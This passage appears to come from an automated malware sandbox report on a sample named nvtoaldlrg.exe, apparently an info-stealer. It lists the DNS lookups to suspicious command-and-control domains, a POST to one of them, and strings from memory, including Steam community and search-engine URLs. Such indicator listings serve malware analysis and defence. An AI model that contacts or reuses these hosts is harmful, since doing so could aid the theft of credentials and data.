https://store.steampowered.com/; equals www.youtube.com (Youtube)
          Source: global trafficDNS traffic detected: DNS query: citydisco.bet
          Source: global trafficDNS traffic detected: DNS query: featureccus.shop
          Source: global trafficDNS traffic detected: DNS query: mrodularmall.top
          Source: global trafficDNS traffic detected: DNS query: jowinjoinery.icu
          Source: global trafficDNS traffic detected: DNS query: legenassedk.top
          Source: global trafficDNS traffic detected: DNS query: htardwarehu.icu
          Source: global trafficDNS traffic detected: DNS query: cjlaspcorne.icu
          Source: global trafficDNS traffic detected: DNS query: bugildbett.top
          Source: global trafficDNS traffic detected: DNS query: latchclan.shop
          Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
          Source: global trafficDNS traffic detected: DNS query: guntac.bet
          Source: unknownHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 73Host: citydisco.bet
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
          Source: nvtoaldlrg.exe, 00000000.00000003.889801356.00000000047CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: nvtoaldlrg.exe, 00000000.00000003.889801356.00000000047CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: nvtoaldlrg.exe, 00000000.00000003.889801356.00000000047CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: nvtoaldlrg.exe, 00000000.00000003.889801356.00000000047CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: nvtoaldlrg.exe, 00000000.00000003.889801356.00000000047CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: nvtoaldlrg.exe, 00000000.00000003.889801356.00000000047CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: nvtoaldlrg.exe, 00000000.00000003.889801356.00000000047CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: nvtoaldlrg.exe, 00000000.00000003.889801356.00000000047CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: nvtoaldlrg.exe, 00000000.00000003.889801356.00000000047CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044DB000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045687411.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046918483.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047024427.000000000151E000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
          Source: nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044DB000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045687411.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046918483.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047024427.000000000151E000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
          Source: nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044DB000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045687411.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046918483.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047024427.000000000151E000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
          Source: nvtoaldlrg.exe, 00000000.00000002.1045933046.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.enigmaprotector.com/
          Source: nvtoaldlrg.exe, 00000000.00000002.1045933046.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.enigmaprotector.com/openU
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
          Source: nvtoaldlrg.exe, 00000000.00000003.889801356.00000000047CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: nvtoaldlrg.exe, 00000000.00000003.889801356.00000000047CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: nvtoaldlrg.exe, 00000000.00000003.842683097.00000000044D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
          Source: nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
          Source: nvtoaldlrg.exe, 00000000.00000003.994650409.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046759978.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.923936426.000000000146B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugildbett.top:443/bAuzaMicrosoft
          Source: nvtoaldlrg.exe, 00000000.00000003.842683097.00000000044D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: nvtoaldlrg.exe, 00000000.00000002.1048162417.00000000044A2000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
          Source: nvtoaldlrg.exe, 00000000.00000003.842683097.00000000044D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: nvtoaldlrg.exe, 00000000.00000003.842683097.00000000044D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
          Source: nvtoaldlrg.exe, 00000000.00000003.923936426.000000000147F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.000000000147F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.000000000147F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046759978.000000000147F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gd
          Source: nvtoaldlrg.exe, 00000000.00000003.994650409.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046759978.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.923936426.000000000146B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cjlaspcorne.icu:443/DbIpsMicrosoft
          Source: nvtoaldlrg.exe, 00000000.00000003.1045687411.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046918483.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastl
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
          Source: nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044DB000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047024427.000000000151E000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=J1-T6FXbrr0Z&a
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045634437.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.0000000001464000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045283888.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021677883.00000000014DD000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047004011.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994470945.0000000001514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=GlKQ1cghJWE2&l=english&_c
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045634437.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021677883.00000000014DD000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
          Source: nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.0000000001464000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045283888.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047004011.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994470945.0000000001514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=engli
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045634437.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.0000000001464000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045283888.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021677883.00000000014DD000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047004011.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994470945.0000000001514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045634437.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021677883.00000000014DD000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045634437.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021677883.00000000014DD000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
          Source: nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
          Source: nvtoaldlrg.exe, 00000000.00000003.1045687411.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046918483.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.pn
          Source: nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044DB000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047024427.000000000151E000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
          Source: nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044DB000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047024427.000000000151E000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
          Source: nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044DB000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047024427.000000000151E000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=jfdbROVe
          Source: nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044DB000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047024427.000000000151E000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=39xC
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.0000000001465000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=cMt-H-zOgNUp&l=english&am
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.0000000001465000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
